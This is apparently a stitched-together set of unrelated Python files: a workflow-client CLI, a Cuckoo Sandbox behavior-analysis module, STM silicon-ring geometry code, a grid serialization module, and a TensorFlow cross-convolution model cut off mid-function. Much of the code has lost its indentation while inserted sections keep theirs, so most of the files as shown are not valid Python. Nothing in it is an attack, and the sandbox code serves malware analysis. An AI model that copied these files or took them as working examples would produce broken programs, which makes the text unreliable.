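# 'outputData') are illustrative assumptions about the server-side task model.
def example_poll_once(server_url, task_type='example_task', worker_id=hostname):
    mgr = WFClientMgr(server_url)
    task = mgr.taskClient.pollForTask(task_type, worker_id)
    if task is None:
        return None
    if not mgr.taskClient.ackTask(task['taskId'], worker_id):
        return None
    task['status'] = 'COMPLETED'
    task['outputData'] = {'echo': task.get('inputData')}
    mgr.taskClient.updateTask(task)
    return task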
def main():
if len(sys.argv) < 3:
print("Usage - python conductor server_url command parameters...")
return None
server_url = sys.argv[1]
command = sys.argv[2]
wfcMgr = WFClientMgr(server_url)
wfc = wfcMgr.workflowClient
if command == 'start':
        if len(sys.argv) < 5:
            print('python conductor server_url start workflow_name input_json [version] [correlationId]')
            return None
        wfName = sys.argv[3]
        input_json = json.loads(sys.argv[4])
        version = int(sys.argv[5]) if len(sys.argv) > 5 else None
        correlationId = sys.argv[6] if len(sys.argv) > 6 else None
        workflowId = wfc.startWorkflow(wfName, input_json, version, correlationId)
print(workflowId)
return workflowId
elif command == 'get':
if len(sys.argv) < 4:
print('python conductor server_url get workflow_id')
return None
wfId = sys.argv[3]
wfjson = wfc.getWorkflow(wfId)
print(json.dumps(wfjson, indent=True, separators=(',', ': ')))
return wfjson
elif command == 'terminate':
if len(sys.argv) < 4:
print('python conductor server_url terminate workflow_id')
return None
wfId = sys.argv[3]
wfc.terminateWorkflow(wfId)
print('OK')
return wfId
if __name__ == '__main__':
main()
|
|
# Copyright (C) 2012-2013 Claudio Guarnieri.
# Copyright (C) 2014-2017 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import collections
import json
import logging
import os
from cuckoo.common.abstracts import Processing, BehaviorHandler
from cuckoo.common.config import config
from cuckoo.core.database import Database
from cuckoo.core.extract import ExtractManager
from .platform.windows import WindowsMonitor
from .platform.linux import LinuxSystemTap
log = logging.getLogger(__name__)
class Summary(BehaviorHandler):
"""Generates overview summary information (not split by process)."""
key = "summary"
event_types = ["generic"]
def __init__(self, *args, **kwargs):
super(Summary, self).__init__(*args, **kwargs)
self.results = collections.defaultdict(set)
def handle_event(self, event):
self.results[event["category"]].add(event["value"])
def run(self):
for key, value in self.results.items():
self.results[key] = list(value)
return self.results
class Anomaly(BehaviorHandler):
"""Anomaly detected during analysis.
For example: a malware tried to remove Cuckoo's hooks.
"""
key = "anomaly"
event_types = ["anomaly"]
def __init__(self, *args, **kwargs):
super(Anomaly, self).__init__(*args, **kwargs)
self.anomalies = []
def handle_event(self, call):
"""Process API calls.
@param call: API call object
@param process: process object
"""
category, funcname, message = None, None, None
for row in call["arguments"]:
if row["name"] == "Subcategory":
category = row["value"]
if row["name"] == "FunctionName":
funcname = row["value"]
if row["name"] == "Message":
message = row["value"]
self.anomalies.append(dict(
# name=process["process_name"],
# pid=process["process_id"],
category=category,
funcname=funcname,
message=message,
))
def run(self):
"""Fetch all anomalies."""
return self.anomalies
class ProcessTree(BehaviorHandler):
"""Generates process tree."""
key = "processtree"
event_types = ["process"]
def __init__(self, *args, **kwargs):
super(ProcessTree, self).__init__(*args, **kwargs)
self.processes = {}
def handle_event(self, process):
if process["pid"] in self.processes:
log.warning(
"Found the same process identifier twice, this "
"shouldn't happen!"
)
return
self.processes[process["pid"]] = {
"pid": process["pid"],
"ppid": process["ppid"],
"process_name": process["process_name"],
"command_line": process.get("command_line"),
"first_seen": process["first_seen"],
"children": [],
"track": process.get("track", True),
}
def run(self):
root = {
"children": [],
}
first_seen = lambda x: x["first_seen"]
procs_seen = []
for p in sorted(self.processes.values(), key=first_seen):
if p["ppid"] in procs_seen:
self.processes[p["ppid"]]["children"].append(p)
else:
root["children"].append(p)
procs_seen.append(p["pid"])
return sorted(root["children"], key=first_seen)
class GenericBehavior(BehaviorHandler):
"""Generates summary information."""
key = "generic"
event_types = ["process", "generic"]
def __init__(self, *args, **kwargs):
super(GenericBehavior, self).__init__(*args, **kwargs)
self.processes = {}
def handle_process_event(self, process):
if process["pid"] in self.processes:
return
self.processes[process["pid"]] = {
"pid": process["pid"],
"ppid": process["ppid"],
"process_name": process["process_name"],
"process_path": process.get("process_path"),
"first_seen": process["first_seen"],
"summary": collections.defaultdict(set),
}
def handle_generic_event(self, event):
if event["pid"] in self.processes:
# TODO: rewrite / generalize / more flexible
pid, category = event["pid"], event["category"]
self.processes[pid]["summary"][category].add(event["value"])
else:
log.warning("Generic event for unknown process id %u", event["pid"])
def run(self):
for process in self.processes.values():
for key, value in process["summary"].items():
process["summary"][key] = list(value)
return self.processes.values()
class ApiStats(BehaviorHandler):
"""Counts API calls."""
key = "apistats"
event_types = ["apicall"]
def __init__(self, *args, **kwargs):
super(ApiStats, self).__init__(*args, **kwargs)
self.processes = collections.defaultdict(lambda: collections.defaultdict(lambda: 0))
def handle_event(self, event):
self.processes["%d" % event["pid"]][event["api"]] += 1
def run(self):
return self.processes
class RebootInformation(BehaviorHandler):
"""Provides specific information useful for reboot analysis.
In reality this is not a true BehaviorHandler as it doesn't return any
data into the JSON report, but instead it writes a log file which will be
interpreted when doing a reboot analysis.
"""
event_types = ["reboot"]
def __init__(self, *args, **kwargs):
super(RebootInformation, self).__init__(*args, **kwargs)
self.events = []
def handle_event(self, event):
self.events.append((event["time"], event))
def run(self):
reboot_path = os.path.join(self.analysis.analysis_path, "reboot.json")
with open(reboot_path, "wb") as f:
for ts, event in sorted(self.events):
f.write("%s\n" % json.dumps(event))
class ActionInformation(BehaviorHandler):
"""Dumps feedback to the user to improve the sandboxing experience."""
event_types = ["action"]
def __init__(self, *args, **kwargs):
super(ActionInformation, self).__init__(*args, **kwargs)
self.actions = []
def handle_event(self, event):
self.actions.append(event["action"])
def run(self):
for action in set(self.actions):
Database().add_error("", self.analysis.task["id"], action)
class ExtractScripts(BehaviorHandler):
"""Extracts embedded scripts in command-line parameters."""
key = "extracted"
event_types = ["process"]
def __init__(self, *args, **kwargs):
super(ExtractScripts, self).__init__(*args, **kwargs)
self.ex = ExtractManager.for_task(self.analysis.task["id"])
def handle_event(self, process):
self.ex.push_command_line(process["command_line"], process)
def run(self):
pass
class BehaviorAnalysis(Processing):
"""Behavior Analyzer.
The behavior key in the results dict will contain both default content
keys that contain generic / abstracted analysis info, available on any
platform, as well as platform / analyzer specific output.
Typically the analyzer behavior contains some sort of "process" separation
as we're tracking different processes in most cases.
There are several handlers that produce the respective keys / subkeys.
Overall the platform / analyzer specific ones parse / process the captured
data and yield both their own output, but also a standard structure that
is then captured by the "generic" handlers so they can generate the
standard result structures.
The resulting structure contains some iterator onions for the monitored
function calls that stream the content when some sink (reporting,
signatures) needs it, thereby reducing memory footprint.
So hopefully in the end each analysis should be fine with 2 passes over
the results, once during processing (creating the generic output,
summaries, etc) and once during reporting (well once for each report type
if multiple are enabled).
"""
key = "behavior"
def _enum_logs(self):
"""Enumerate all behavior logs."""
if not os.path.exists(self.logs_path):
log.warning("Analysis results folder does not exist at path %r.", self.logs_path)
return
logs = os.listdir(self.logs_path)
if not logs:
log.warning("Analysis results folder does not contain any behavior log files.")
return
for fname in logs:
path = os.path.join(self.logs_path, fname)
if not os.path.isfile(path):
log.warning("Behavior log file %r is not a file.", fname)
continue
limit = config("cuckoo:processing:analysis_size_limit")
if limit and os.stat(path).st_size > limit:
# This needs to be a big alert.
log.critical("Behavior log file %r is too big, skipped.", fname)
continue
yield path
def run(self):
"""Run analysis.
@return: results dict.
"""
self.state = {}
# these handlers will be present for any analysis, regardless of platform/format
handlers = [
GenericBehavior(self),
ProcessTree(self),
Summary(self),
Anomaly(self),
ApiStats(self),
# platform specific stuff
WindowsMonitor(self),
LinuxSystemTap(self),
# Reboot information.
RebootInformation(self),
# User feedback action information.
ActionInformation(self),
# Extracts embedded scripts in the command-line.
ExtractScripts(self),
]
# doesn't really work if there's no task, let's rely on the file name for now
# # certain handlers only makes sense for a specific platform
# # this allows us to use the same filenames/formats without confusion
# if self.task.machine.platform == "windows":
# handlers += [
# WindowsMonitor(self),
# ]
# elif self.task.machine.platform == "linux":
# handlers += [
# LinuxSystemTap(self),
# ]
# create a lookup map
interest_map = {}
for h in handlers:
for event_type in h.event_types:
if event_type not in interest_map:
interest_map[event_type] = []
# If available go for the specific event type handler rather
# than the generic handle_event.
if hasattr(h, "handle_%s_event" % event_type):
fn = getattr(h, "handle_%s_event" % event_type)
interest_map[event_type].append(fn)
elif h.handle_event not in interest_map[event_type]:
interest_map[event_type].append(h.handle_event)
# Each log file should be parsed by one of the handlers. This handler
# then yields every event in it which are forwarded to the various
# behavior/analysis/etc handlers.
for path in self._enum_logs():
for handler in handlers:
# ... whether it is responsible
if not handler.handles_path(path):
continue
# ... and then let it parse the file
for event in handler.parse(path):
# pass down the parsed message to interested handlers
for hhandler in interest_map.get(event["type"], []):
res = hhandler(event)
# We support one layer of "generating" new events,
# which we'll pass on again (in case the handler
# returns some).
if not res:
continue
for subevent in res:
for hhandler2 in interest_map.get(subevent["type"], []):
hhandler2(subevent)
behavior = {}
for handler in handlers:
try:
r = handler.run()
if not r:
continue
behavior[handler.key] = r
except:
log.exception("Failed to run partial behavior class \"%s\"", handler.key)
return behavior
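
# A hedged sketch (not wired into BehaviorAnalysis.run() above) of the handler
# contract described in the BehaviorAnalysis docstring: a `key`, the
# `event_types` of interest, a handle_event() (or handle_<type>_event())
# callback, and a run() whose return value lands under behavior[key]. The
# "mutex" category used below is an illustrative assumption about the generic
# event stream.
class MutexSummaryExample(BehaviorHandler):
    """Collects mutex names seen in generic events (example only)."""
    key = "mutexes_example"
    event_types = ["generic"]

    def __init__(self, *args, **kwargs):
        super(MutexSummaryExample, self).__init__(*args, **kwargs)
        self.mutexes = set()

    def handle_event(self, event):
        if event["category"] == "mutex":
            self.mutexes.add(event["value"])

    def run(self):
        return sorted(self.mutexes)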
|
|
from sklearn.neighbors import NearestNeighbors
def get_distance(pt1, pt2):
""" Finds the distance between two points. """
x1 = pt1[0]
y1 = pt1[1]
x2 = pt2[0]
y2 = pt2[1]
    return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
class Si():
""" Contains the location of the Si atom, as well as each of the
three rings surrounding it. Objects do not automatically calculate
their locations if you do not tell them to. NOTE: The main
functionality is done in nanometers. Pixel locations are held on to so
they can be easy to grab, but, if you start calling complex methods
with pixel dimensions, you're going to have a bad time. """
""" Public Methods """
def __init__(self, x, y, z, unit):
""" Constructor """
if unit == "nm":
self._nm_location = [x, y, z]
self._pixel_location = [0, 0, 0]
else:
self._pixel_location = [x, y, z]
self._nm_location = [0, 0, 0]
self._rings = []
        self._hole_dist = 0  # distance to the nearest hole, assigned after construction
self._d1 = 0
self._d2 = 0
self._d3 = 0
def _findClosestThree(self, ring_list, x_max, y_max, edge_buffer):
if self.is_edge(x_max, y_max, edge_buffer):
return
ring_pos = []
for ring in ring_list:
ring_pos.append(ring.get_nm_location())
nearest = NearestNeighbors(n_neighbors=3, algorithm='ball_tree').fit(ring_pos)
dist, ind = nearest.kneighbors([self.get_nm_location()])
for i in range(len(ind[0])):
self._rings.append(ring_list[ind[0][i]])
    def find_rings(self, ring_list, x_max, y_max, edge_buffer):
        """ Finds the three rings bordering this Si atom, and stores
        them in self._rings. """
        # Older, step-wise implementation kept for reference:
        # self._findFirst(ring_list, x_max, y_max, edge_buffer)
        # if len(self.get_rings()) == 1:
        #     self._findSecond(ring_list, x_max, y_max, edge_buffer)
        # if len(self.get_rings()) == 2:
        #     self._findThird(ring_list, x_max, y_max, edge_buffer)
        self._findClosestThree(ring_list, x_max, y_max, edge_buffer)
def get_nm_location(self):
""" Returns the location in (x, y, z) form. Units are nm. """
return self._nm_location
    def get_pix_location(self):
        """ Returns the location in (x, y, z) form. Units are pixels. """
        return self._pixel_location
    def find_nm_location(self, nm_dim, im_width, im_height):
        """ Finds the coordinates in nm when the pixel coordinates are
        known. """
        scale = (nm_dim[0] / im_width)
        for i in range(3):
            self._nm_location[i] = scale * self._pixel_location[i]
    def find_pix_location(self, nm_dim, im_width, im_height):
        """ Finds the coordinates in pixels when the nm coordinates are
        known. """
        scale = (im_width / nm_dim[0])
        for i in range(3):
            self._pixel_location[i] = scale * self._nm_location[i]
def get_rings(self):
""" Returns the list of rings bordering the atom. """
return self._rings
def is_edge(self, max_x, max_y, edge_buffer):
""" Determines if this Si atom is on the edge of the image
returns true if so, false otherwise. """
x = self.get_nm_location()[0]
y = self.get_nm_location()[1]
d = edge_buffer
return x < d or x > max_x - d or y < d or y > max_y - d
def assign_hole_dist(self, hole_dist):
self._hole_dist = hole_dist
def get_hole_dist(self):
return self._hole_dist
""" Private Methods """
def _findFirst(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the closest ring center to the atom. If there are
equidistant centers, puts all into self._rings. """
# Excludes any Si atoms that are included as an edge case
if self.is_edge(x_max, y_max, edge_buffer):
return
# Sets an arbitrary number as the first distance. This number
# is used because it will be bigger than any distance
# calculated.
distance = 100000000000000000000
answers = []
for i in range(len(ring_list)):
c1 = ring_list[i].get_nm_location()
c2 = self.get_nm_location()
# Checks if the calculate distance is less than the current
# smallest distance. If so, resets the answer list and adds
# the newest ring.
if get_distance(c1, c2) < distance:
answers = []
answers.append(ring_list[i])
distance = get_distance(c1, c2)
if get_distance(c1, c2) == distance:
answers.append(ring_list[i])
for ring in answers:
self._rings.append(ring)
# print(len(self._rings))
ring.set_atom(self)
self._d1 = distance
def _findSecond(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the second closest ring center to the atom. If there
are equidistant centers, puts all into self._rings. """
if self.is_edge(x_max, y_max, edge_buffer):
return
distance = 100000000000000000000
answers = []
for i in range(len(ring_list)):
c1 = ring_list[i].get_nm_location()
c2 = self.get_nm_location()
dist_2 = get_distance(c1, c2)
if dist_2 < distance and dist_2 > self._d1:
answers = []
answers.append(ring_list[i])
distance = dist_2
if dist_2 == distance and dist_2 > self._d1:
answers.append(ring_list[i])
for ring in answers:
self._rings.append(ring)
ring.set_atom(self)
self._d2 = distance
def _findThird(self, ring_list, x_max, y_max, edge_buffer):
""" Finds the second closest ring center to the atom. """
if self.is_edge(x_max, y_max, edge_buffer):
return
distance = 100000000000000000000
answers = []
for i in range(len(ring_list)):
c1 = ring_list[i].get_nm_location()
c2 = self.get_nm_location()
dist_2 = get_distance(c1, c2)
if dist_2 < distance and dist_2 > self._d2:
answers = []
answers.append(ring_list[i])
distance = dist_2
if dist_2 == distance and dist_2 > self._d2:
answers.append(ring_list[i])
for ring in answers:
self._rings.append(ring)
ring.set_atom(self)
self._d3 = distance
class ring_center():
""" Contains the location of the ring center, and the type of ring
(number of members). Objects do not automatically calculate their
locations if you do not tell them to. NOTE: The main functionality is
done in nanometers. Pixel locations are held on to so they can be easy
to grab, but, if you start calling complex methods with pixel
dimensions, you're going to have a bad time. """
def __init__(self, ring_type, x, y, z, unit):
""" Constructor. """
self._ring_type = ring_type
if unit == "nm":
self._nm_location = [x, y, z]
self._pixel_location = [0, 0, 0]
else:
self._nm_location = [0, 0, 0]
self._pixel_location = [x, y, z]
self._atoms = []
def get_nm_location(self):
""" Returns the location in (x, y, z) form. Units are nm. """
return self._nm_location
    def get_pix_location(self):
        """ Returns the location in (x, y, z) form. Units are pixels. """
        return self._pixel_location
    def find_nm_location(self, nm_dim, im_width, im_height):
        """ Finds the coordinates in nm when the pixel coordinates are
        known. """
        scale = (nm_dim[0] / im_width)
        for i in range(3):
            self._nm_location[i] = scale * self._pixel_location[i]
    def find_pix_location(self, nm_dim, im_width, im_height):
        """ Finds the coordinates in pixels when the nm coordinates are
        known. """
        scale = (im_width / nm_dim[0])
        for i in range(3):
            self._pixel_location[i] = scale * self._nm_location[i]
def change_location(self, x, y, z, unit, nm_dim, im_width, im_height):
""" Changes the coordinates of the center, and finds the coordinates in
the other unit. """
if unit == "nm":
self._nm_location = [x, y, z]
self.find_pix_location(nm_dim, im_width, im_height)
else:
self._pixel_location = [x, y, z]
self.find_nm_location(nm_dim, im_width, im_height)
def get_type(self):
"""returns type of ring"""
return self._ring_type
def set_atom(self, atom):
""" Puts an atom into self._atoms. """
self._atoms.append(atom)
def get_atoms(self):
""" Returns the atom list """
return self._atoms
def remove(self, index):
""" Removes an atom from the atom list BY INDEX """
del self._atoms[index]
class STM():
""" A class to describe the STM image. Includes information like filename,
Image Dimensions (pixels), sample dimensions (nm), scale, number of holes,
and coordinates of those holes."""
def __init__(self, filename, im_dim, sample_dim, num_holes):
""" Constructor. """
self._filename = filename
self._im_dim = im_dim # [image width, image height] (pixels)
self._sample_dim = sample_dim # [sample width, sample height] (nm)
self._scale = im_dim[0] / sample_dim[0] # ratio pixels/nm
self._num_holes = num_holes
self._hole_coords = []
def get_filename(self):
return self._filename
def get_im_dim(self):
return self._im_dim
def get_sample_dim(self):
return self._sample_dim
def get_scale(self):
return self._scale
def get_num_holes(self):
return self._num_holes
def get_hole_coords(self):
return self._hole_coords
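
# A hedged usage sketch (kept out of main() on purpose): three ring centers
# around one Si atom, all in nm, and a query for the atom's bordering rings.
# The coordinates, image bounds, and edge buffer are made-up illustrative values.
def _example_find_rings():
    rings = [ring_center(6, 4.0, 5.0, 0.0, "nm"),
             ring_center(6, 5.0, 6.0, 0.0, "nm"),
             ring_center(5, 6.0, 5.0, 0.0, "nm")]
    atom = Si(5.0, 5.0, 0.0, "nm")
    atom.find_rings(rings, x_max=10.0, y_max=10.0, edge_buffer=1.0)
    return [r.get_type() for r in atom.get_rings()]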
def main():
return
main()
|
|
import itertools, importlib
from collections.abc import Mapping
import json
class Lazy_Coord(float):
"""Implements a lazily_evaluated value. Effectively implements a blob
of lazy getattrs that can be done arithmetic on. Not actually used at this
point. (But it works too well to rip out without me feeling sad. : ( )
TODO: Does this really need to be a float subclass? It should work
regardless of what the type that self.function returns. I think I
can generalize to Lazy_Object if I implement the magic methods needed
for non-numerics."""
def __new__(cls, *args, **kwargs):
return super().__new__(cls)#*args, **kwargs)
    #Note: To implement this, just make sure to calculate the current value
#when doing __mul__, __add__, etc.
def __init__(self, obj, field_name):
super().__init__()
self.object = obj
self.field_name = field_name
self.function = lambda: getattr(self.object, self.field_name)
def __add__(self, other):
sum = Lazy_Coord(self.object, self.field_name)
sum.function = lambda: self.function() + (other.function() if hasattr(other, "function") else other)
return sum
__radd__ = __add__
def __sub__(self, other):
difference = Lazy_Coord(self.object, self.field_name)
difference.function = lambda: self.function() - (other.function() if hasattr(other, "function") else other)
return difference
def __mul__(self, other):
product = Lazy_Coord(self.object, self.field_name)
product.function = lambda: self.function() * (other.function() if hasattr(other, "function") else other)
return product
def __truediv__(self, other):
quotient = Lazy_Coord(self.object, self.field_name)
quotient.function = lambda: self.function() / (other.function() if hasattr(other, "function") else other)
return quotient
def __floordiv__(self, other):
quotient = Lazy_Coord(self.object, self.field_name)
quotient.function = lambda: self.function() // (other.function() if hasattr(other, "function") else other)
return quotient
def __pow__(self, other, mod=None):
#Not exactly the technical term...
raised_thing = Lazy_Coord(self.object, self.field_name)
if mod is None:
raised_thing.function = lambda: self.function() ** (other.function() if hasattr(other, "function") else other)
else:
raised_thing.function = lambda: self.function() ** (other.function() if hasattr(other, "function") else other) % mod
return raised_thing
def __float__(self):
#Haha. I can't believe I forgot to add the mechanism for a lazy number to be converted to a real number.
return float(self.function())
def __int__(self):
return int(self.function())
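
# A hedged usage sketch of Lazy_Coord: arithmetic builds up a deferred expression
# that re-reads the underlying attribute every time it is realized with float()
# or int(). The Point class below is a throwaway illustration, not part of the
# module's data model.
def _lazy_coord_example():
    class Point:
        def __init__(self, x):
            self.x = x
    p = Point(3)
    shifted = Lazy_Coord(p, "x") + 10   # nothing evaluated yet
    first = float(shifted)              # 13.0
    p.x = 7
    second = float(shifted)             # 17.0 -- recomputed lazily
    return first, second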
class Unset_Sentinel:
def __repr__(self):
return type(self).__name__
def __str__(self):
return type(self).__name__
def __hash__(self):
return id(self)
def jsonify(self):
return {"": None}
@classmethod
def dejsonify(cls, json_dict):
return not_set
not_set = Unset_Sentinel()
class Node:
def __init__(self, data=not_set, x=None, y=None):
self.data = data
self.x = x
self.y = y
self.left = self.right = self.up = self.down = None
def __str__(self):
return "Node({data})".format(data=str(self.data))
__repr__ = __str__
def jsonify(self):
cls = type(self.data)
return {"data": self.data,
"data_class": cls.__module__ + "." + cls.__qualname__,
"x": self.x,
"y": self.y}
@classmethod
def dejsonify(cls, json_dict):
x = json_dict["x"]
y = json_dict["y"]
*module_pieces, data_cls = json_dict["data_class"].split(".")
data_cls_module = importlib.import_module(".".join(module_pieces))
data_cls = getattr(data_cls_module, data_cls)
if hasattr(data_cls, "dejsonify"):
data = data_cls.dejsonify(json_dict["data"])
elif data_cls in [str, int, float, bool]:
data = json_dict["data"]
me = cls(data=data, x=x, y=y)
return me
    def __eq__(self, other):
        # Identity comparison. The field-by-field version below is kept for
        # reference but disabled: following the left/right/up/down links of two
        # distinct-but-connected nodes would recurse without bound.
        # fields = ["data", "x", "y", "left", "right", "up", "down"]
        # try:
        #     return all(getattr(self, field) == getattr(other, field) for field in fields)
        # except AttributeError:
        #     return False
        return self is other
class Grid:
def __init__(self, columns=50, rows=50, nodes=None):
"""Represents an m x n grid of nodes.
Internally implemented as a list of lists. (Sparseness
was considered, but for my usecase, it will always be fully
populated, so it was unnecessary complexity)"""
if nodes is None:
self.nodes = []
for x in range(columns):
self.nodes.append([])
for y in range(rows):
node = Node()
if x > 0:
left = self.nodes[x-1][y]
node.left = left
left.right = node
if y > 0:
down = self.nodes[x][y-1]
node.down = down
down.up = node
node.x = x
node.y = y
self.nodes[x].append(node)
else:
self.nodes = nodes
def __getitem__(self, indices):
#For now, only supporting grid[1,2] syntax
#(I.e. no ellipses or ranges please)
x, y = indices
return self.nodes[x][y]
def __setitem__(self, indices, data):
x, y = indices
if x < 0:
x = len(self.nodes) + x
if y < 0:
y = len(self.nodes[x]) + y
#The main behavior requirements considered for the
#current design:
#O(1) lookup (Not strictly needed, but nice)
#O(1) neighbor lookup (Radial damage, etc)
#O(n) insertion
#(Deletion's performance is irrelevant as I never intend to
#remove from the data structure) (For completeness: all subclasses must
#have O(n) worst case performance here)
#I currently have O(1) for all of these, given that I dropped the sparseness
#design. A sparse list of lists would work with these complexity
#requirements
#Memory requirements are O(n), where n = number of nodes
#(reminder: Constant factors don't matter for O-notation)
#The current design seems to meet these requirements (it exceeds them in fact),
#so I'm not spending further time thinking about it
node = Node(data)
if x > 0:
print(x, y, len(self.nodes))
print(len(self.nodes[x-1]))
left = self.nodes[x-1][y]
node.left = left
if left:
left.right = node
if x < (len(self.nodes) - 1):
right = self.nodes[x+1][y]
node.right = right
if right:
right.left = node
if y > 0:
down = self.nodes[x][y-1]
node.down = down
if down:
down.up = node
if y < (len(self.nodes[x]) - 1):
up = self.nodes[x][y+1]
node.up = up
if up:
up.down = node
node.x = x
node.y = y
self.nodes[x][y] = node
def __iter__(self):
return itertools.chain(*self.nodes)
@property
def columns(self):
return len(self.nodes)
@property
def rows(self):
#Assuming a consistently-sized matrix
return len(self.nodes[0] if self.nodes else [])
def jsonify(self):
return {"nodes": self.nodes}
@classmethod
def dejsonify(cls, json_dict):
nodes = []
for col in json_dict["nodes"]:
column = []
for row in col:
node = Node.dejsonify(row)
column.append(node)
nodes.append(column)
me = Grid(nodes=nodes)
return me
def __str__(self):
return "Grid(columns={cols}, rows={rows})".format(cols=len(self.nodes),
rows=len(self.nodes[0]) if self.nodes else 0)
__repr__ = __str__
def __eq__(self, other):
for node1, node2 in zip(self, other):
if node1.data != node2.data:
print(node1.data, node2.data)
return False
return True
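
# A hedged usage sketch (not executed at import time): building a small Grid,
# replacing one node via __setitem__, and walking its neighbor links.
def _grid_example():
    g = Grid(columns=3, rows=3)
    g[1, 1] = "centre"
    node = g[1, 1]
    # the left neighbor sits in column 0, the up neighbor in row 2
    return node.data, node.left.x, node.up.y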
def get_git_password():
    # Use a context manager so the file handle is closed promptly.
    with open("../password.txt") as f:
        return f.readline().strip()
def jsonify(arg):
"""Woo recursion!"""
if hasattr(arg, "jsonify"):
return jsonify(arg.jsonify())
known_types = [str, int, float, bool, type(None)]
if type(arg) in known_types:
return arg
#If it's a mapping
if isinstance(arg, Mapping):
def wrap(item):
return type(arg)(item)
return wrap({jsonify(key): jsonify(value) for (key, value) in arg.items()})
if hasattr(arg, "__iter__"):
def wrap(item):
return type(arg)([item])
if len(arg) > 1:
head, *tail = arg
#Python doesn't do tail-call optimization anyway
#tail is already an iterable due to the star
#(even if it's a single element)
return wrap(jsonify(head)) + jsonify(tail)
elif len(arg) == 1:
return wrap(jsonify(arg[0]))
else:
return wrap([])
raise ValueError("Unbytify-able object: {obj}".format(obj=arg))
def bytify(arg):
return json.dumps(jsonify(arg)).encode("utf-8")
def debytify(byte_string):
string = byte_string.decode("utf-8")
dictionary = json.loads(string)
#This might raise exceptions, but that's fine. (There's no way to elegantly
#handle them here.)
module_name, cls_name = dictionary["name"].rsplit(".", 1)
module = importlib.import_module(module_name)
cls = getattr(module, cls_name)
json_dict = json.loads(string)
return cls.dejsonify(json_dict)
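
# A hedged sanity-check sketch for jsonify()/bytify(): plain dicts, lists and
# scalars pass through unchanged and serialize to UTF-8 JSON bytes. Objects with
# a jsonify() method (Node, Grid, Unset_Sentinel above) are flattened the same
# way; note that debytify() additionally expects a top-level "name" entry naming
# the class to rebuild, which this simple payload does not carry.
def _jsonify_example():
    payload = {"title": "demo", "scores": [1, 2, 3], "extra": None}
    assert jsonify(payload) == payload   # already JSON-friendly, returned as-is
    return bytify(payload)               # JSON bytes, e.g. b'{"title": "demo", ...}'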
|
|
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Cross Convolutional Model.
https://arxiv.org/pdf/1607.02586v1.pdf
"""
import math
import sys
import tensorflow as tf
slim = tf.contrib.slim
class CrossConvModel(object):
def __init__(self, image_diff_list, params):
"""Constructor.
Args:
image_diff_list: A list of (image, diff) tuples, with shape
[batch_size, image_size, image_size, 3] and image_sizes as
[32, 64, 128, 256].
params: Dict of parameters.
"""
self.images = [i for (i, _) in image_diff_list]
# Move the diff to the positive realm.
self.diffs = [(d + params['scale']) / 2 for (i, d) in image_diff_list]
self.params = params
def Build(self):
with tf.device('/gpu:0'):
with slim.arg_scope([slim.conv2d],
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params={'is_training':
self.params['is_training']}):
self._BuildMotionKernel()
encoded_images = self._BuildImageEncoder()
cross_conved_images = self._CrossConv(encoded_images)
self._BuildImageDecoder(cross_conved_images)
self._BuildLoss()
image = self.images[1]
diff = self.diffs[1]
self.global_step = tf.Variable(0, name='global_step', trainable=False)
if self.params['is_training']:
self._BuildTrainOp()
diff = diff * 2.0 - self.params['scale']
diff_output = self.diff_output * 2.0 - self.params['scale']
concat_image = tf.concat(
axis=1, values=[image, image + diff_output, image + diff, diff_output])
tf.summary.image('origin_predict_expect_predictdiff', concat_image)
self.summary_op = tf.summary.merge_all()
return self.loss
def _BuildTrainOp(self):
lrn_rate = tf.maximum(
0.01, # min_lr_rate.
tf.train.exponential_decay(
self.params['learning_rate'], self.global_step, 10000, 0.5))
tf.summary.scalar('learning rate', lrn_rate)
optimizer = tf.train.GradientDescentOptimizer(lrn_rate)
self.train_op = slim.learning.create_train_op(
self.loss, optimizer, global_step=self.global_step)
def _BuildLoss(self):
    # 1. reconstr_loss doesn't seem to do better than l2 loss.
# 2. Only works when using reduce_mean. reduce_sum doesn't work.
# 3. It seems kl loss doesn't play an important role.
self.loss = 0
with tf.variable_scope('loss'):
if self.params['l2_loss']:
l2_loss = tf.reduce_mean(tf.square(self.diff_output - self.diffs[1]))
tf.summary.scalar('l2_loss', l2_loss)
self.loss += l2_loss
if self.params['reconstr_loss']:
reconstr_loss = (-tf.reduce_mean(
self.diffs[1] * (1e-10 + self.diff_output) +
(1-self.diffs[1]) * tf.log(1e-10 + 1 - self.diff_output)))
reconstr_loss = tf.check_numerics(reconstr_loss, 'reconstr_loss')
tf.summary.scalar('reconstr_loss', reconstr_loss)
self.loss += reconstr_loss
if self.params['kl_loss']:
kl_loss = (0.5 * tf.reduce_mean(
tf.square(self.z_mean) + tf.square(self.z_stddev) -
2 * self.z_stddev_log - 1))
tf.summary.scalar('kl_loss', kl_loss)
self.loss += kl_loss
tf.summary.scalar('loss', self.loss)
def _BuildMotionKernel(self):
image = self.images[-2]
diff = self.diffs[-2]
shape = image.get_shape().as_list()
assert shape[1] == shape[2] and shape[1] == 128
batch_size = shape[0]
net = tf.concat(axis=3, values=[image, diff])
with tf.variable_scope('motion_encoder'):
with slim.arg_scope([slim.conv2d], padding='VALID'):
net = slim.conv2d(net, 96, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
net = slim.conv2d(net, 96, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
net = slim.conv2d(net, 128, [5, 5], stride=1)
net = slim.conv2d(net, 128, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
net = slim.conv2d(net, 256, [4, 4], stride=1)
net = slim.conv2d(net, 256, [3, 3], stride=1)
z = tf.reshape(net, shape=[batch_size, -1])
self.z_mean, self.z_stddev_log = tf.split(
axis=1, num_or_size_splits=2, value=z)
self.z_stddev = tf.exp(self.z_stddev_log)
epsilon = tf.random_normal(
self.z_mean.get_shape().as_list(), 0, 1, dtype=tf.float32)
